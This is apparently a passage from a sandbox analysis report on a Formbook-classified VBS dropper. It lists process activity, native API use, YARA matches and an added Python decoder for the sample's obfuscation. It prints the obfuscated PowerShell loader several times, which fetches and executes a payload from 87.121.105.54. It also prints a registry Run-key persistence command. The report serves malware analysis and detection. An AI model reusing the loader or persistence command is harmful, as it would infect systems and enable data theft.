Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed
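Every string this loader uses is built by Programregningsfunktionens: the real characters sit at indices 5, 11, 17, ... of the argument, the five characters before each are filler, and the loop bound Length-1 drops the trailing filler group; $Elytrigerous is assembled as 'Substring' and invoked reflectively so the method name never appears in clear, and Gracy216 dot-sources $Antediluvianske, which decodes to iex, so every Gracy216 call is an Invoke-Expression of a decoded string. The Python below is an added example (not part of the report) that mirrors that loop offline, without executing any of the PowerShell, and pulls every helper call out of a command-line excerpt with a regular expression. The excerpt is copied from the command line above (the wrapped line joined with the single space before "Gr,n5"); the helper and variable names are the sample's own. One caveat for anyone decoding from this page rather than from the original command line: the HTML extraction collapsed runs of spaces, so arguments whose filler contains two adjacent spaces (the User-Agent string assigned to $Diskoskasteren, for instance) no longer decode cleanly from the page text; decode from the submitted .vbs or from process telemetry instead.

```python
import re


def decode_every_sixth(s: str, start: int = 5, step: int = 6) -> str:
    """Mirror of the sample's helper:
    For($i=5; $i -lt $s.Length-1; $i+=6){ $out += $s.Substring($i,1) }
    Indices 5, 11, 17, ... are the real characters; the five before each
    are filler; the bound Length-1 drops the final filler group."""
    return "".join(s[i] for i in range(start, len(s) - 1, step))


def helper_call_pattern(helper: str) -> re.Pattern:
    # Calls in this sample always take one single-quoted literal.
    return re.compile(re.escape(helper) + r"\s+'([^']*)'")


def decode_calls(cmdline: str, helper: str = "Programregningsfunktionens") -> list:
    """Decode every helper call in document order."""
    return [decode_every_sixth(m.group(1))
            for m in helper_call_pattern(helper).finditer(cmdline)]


def decode_assignments(cmdline: str, helper: str = "Programregningsfunktionens") -> dict:
    """Map variable name -> decoded value for $x=helper '...' assignments."""
    pat = re.compile(r"\$(\w+)\s*=\s*" + re.escape(helper) + r"\s+'([^']*)'")
    return {m.group(1): decode_every_sixth(m.group(2)) for m in pat.finditer(cmdline)}


# Excerpt copied from the command line in the report. The URL argument
# spans a wrapped line there; it is joined here with the single space that
# precedes "Gr,n5" (that space is filler, not data).
EXCERPT = (
    "$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';"
    "$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n."
    "Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcet"
    "mis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';"
    "$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';"
    "$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';"
)

if __name__ == "__main__":
    for name, value in decode_assignments(EXCERPT).items():
        print(f"${name} = {value!r}")
```

Run against the excerpt, $Reprogrammes decodes to http://87.121.105.54/Ommestrup.deploy, which is exactly the first GET the Networking section records, and $Sprayens decodes to User-Agent, the header name the loader sets on that request. The decoder deliberately does not try to repair collapsed whitespace: there is no way to tell which filler position a lost space belonged to, so a mismatch between a decoded value and the observed traffic is the signal that the input copy is damaged.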
        Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code functions (address, then the native APIs it reaches):
            17_2_248835C0  NtCreateMutant, LdrInitializeThunk
            17_2_24882DF0  NtQuerySystemInformation, LdrInitializeThunk
            17_2_24882B60  NtClose, LdrInitializeThunk
            17_2_24882C70  NtFreeVirtualMemory, LdrInitializeThunk
            17_2_24882B80  NtQueryInformationFile
            17_2_24882E80  NtReadVirtualMemory
            17_2_24882F90  NtProtectVirtualMemory
            17_2_24883090  NtSetValueKey
            17_2_24882BA0  NtEnumerateValueKey
            17_2_24882CA0  NtQueryInformationToken
            17_2_24882EA0  NtAdjustPrivilegesToken
            17_2_24882FA0  NtQuerySection
            17_2_24882AB0  NtWaitForSingleObject
            17_2_24882DB0  NtEnumerateKey
            17_2_24882FB0  NtResumeThread
            17_2_248839B0  NtGetContextThread
            17_2_24882CC0  NtQueryVirtualMemory
            17_2_24882AD0  NtReadFile
            17_2_24882DD0  NtDelayExecution
            17_2_24882BE0  NtQueryValueKey
            17_2_24882EE0  NtQueueApcThread
            17_2_24882FE0  NtCreateFile
            17_2_24882BF0  NtAllocateVirtualMemory
            17_2_24882AF0  NtWriteFile
            17_2_24882CF0  NtOpenProcess
            17_2_24882C00  NtQueryInformationProcess
            17_2_24882D00  NtSetInformationFile
            17_2_24882D10  NtMapViewOfSection
            17_2_24883010  NtOpenDirectoryObject
            17_2_24883D10  NtOpenProcessToken
            17_2_24882D30  NtUnmapViewOfSection
            17_2_24882E30  NtWriteVirtualMemory
            17_2_24882F30  NtCreateSection
            17_2_24884340  NtSetContextThread
            17_2_24884650  NtSuspendThread
            17_2_24882C60  NtCreateKey
            17_2_24882F60  NtCreateProcessEx
            17_2_24883D70  NtOpenThread
            17_2_075EE7D1  Sleep, LdrInitializeThunk, NtProtectVirtualMemory
        Source: C:\Windows\SysWOW64\xcopy.exe | Code functions (address, then the native APIs it reaches):
            22_2_03924340  NtSetContextThread, LdrInitializeThunk
            22_2_03923090  NtSetValueKey, LdrInitializeThunk
            22_2_03924650  NtSuspendThread, LdrInitializeThunk
            22_2_039235C0  NtCreateMutant, LdrInitializeThunk
            22_2_03922BA0  NtEnumerateValueKey, LdrInitializeThunk
            22_2_03922BF0  NtAllocateVirtualMemory, LdrInitializeThunk
            22_2_03922BE0  NtQueryValueKey, LdrInitializeThunk
            22_2_03922B60  NtClose, LdrInitializeThunk
            22_2_03922AD0  NtReadFile, LdrInitializeThunk
            22_2_03922AF0  NtWriteFile, LdrInitializeThunk
            22_2_039239B0  NtGetContextThread, LdrInitializeThunk
            22_2_03922FB0  NtResumeThread, LdrInitializeThunk
            22_2_03922FE0  NtCreateFile, LdrInitializeThunk
            22_2_03922F30  NtCreateSection, LdrInitializeThunk
            22_2_03922E80  NtReadVirtualMemory, LdrInitializeThunk
            22_2_03922EE0  NtQueueApcThread, LdrInitializeThunk
            22_2_03922DD0  NtDelayExecution, LdrInitializeThunk
            22_2_03922DF0  NtQuerySystemInformation, LdrInitializeThunk
            22_2_03922D10  NtMapViewOfSection, LdrInitializeThunk
            22_2_03922D30  NtUnmapViewOfSection, LdrInitializeThunk
            22_2_03922CA0  NtQueryInformationToken, LdrInitializeThunk
            22_2_03922C70  NtFreeVirtualMemory, LdrInitializeThunk
            22_2_03922C60  NtCreateKey, LdrInitializeThunk
            22_2_03923010  NtOpenDirectoryObject
            22_2_03922B80  NtQueryInformationFile
            22_2_03922AB0  NtWaitForSingleObject
            22_2_03922F90  NtProtectVirtualMemory
            22_2_03922FA0  NtQuerySection
            22_2_03922F60  NtCreateProcessEx
            22_2_03922EA0  NtAdjustPrivilegesToken
            22_2_03922E30  NtWriteVirtualMemory
            22_2_03922DB0  NtEnumerateKey
            22_2_03923D10  NtOpenProcessToken
            22_2_03922D00  NtSetInformationFile
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03923D70 NtOpenThread,22_2_03923D70
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922CC0 NtQueryVirtualMemory,22_2_03922CC0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922CF0 NtOpenProcess,22_2_03922CF0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03922C00 NtQueryInformationProcess,22_2_03922C00
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_02F57680 NtCreateFile,22_2_02F57680
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_02F577E0 NtReadFile,22_2_02F577E0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_02F57AC0 NtAllocateVirtualMemory,22_2_02F57AC0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_02F578D0 NtDeleteFile,22_2_02F578D0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_02F57970 NtClose,22_2_02F57970
        Source: C:\Windows\SysWOW64\xcopy.exe | Code function: String function: 038DB970 appears 268 times
        Source: C:\Windows\SysWOW64\xcopy.exe | Code function: String function: 03937E54 appears 96 times
        Source: C:\Windows\SysWOW64\xcopy.exe | Code function: String function: 0396F290 appears 105 times
        Source: C:\Windows\SysWOW64\xcopy.exe | Code function: String function: 03925130 appears 36 times
        Source: C:\Windows\SysWOW64\xcopy.exe | Code function: String function: 0395EA12 appears 86 times
        Source: 01105751.vbs | Initial sample: Strings found which are bigger than 50
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)"
        Source: amsi64_5692.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: amsi32_6096.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: 00000017.00000002.3568353158.0000000001500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000016.00000002.3568882333.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000011.00000002.3231394969.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000011.00000002.3306907165.0000000025560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000016.00000002.3568770287.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: Process Memory Space: powershell.exe PID: 5692, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winVBS@33/10@3/3
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Sagsgningerne.Int
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2436:120:WilError_03
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6444:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5856:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2268:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3776:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b4c0somd.z5j.ps1
        Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\01105751.vbs"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5692
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6096
        Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknown | Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\PING.EXE ping google.com -n 1
        Source: C:\Windows\System32\PING.EXE | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\PING.EXE ping %.%.%.%
        Source: C:\Windows\System32\PING.EXE | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. 
Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sagsgningerne.Int && echo $"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. 
Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sagsgningerne.Int && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)"
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | Process created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"
Source: unknown | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: unknown | Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: C:\Windows\SysWOW64\xcopy.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: unknown | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\PING.EXE ping google.com -n 1
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\PING.EXE ping %.%.%.%
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi 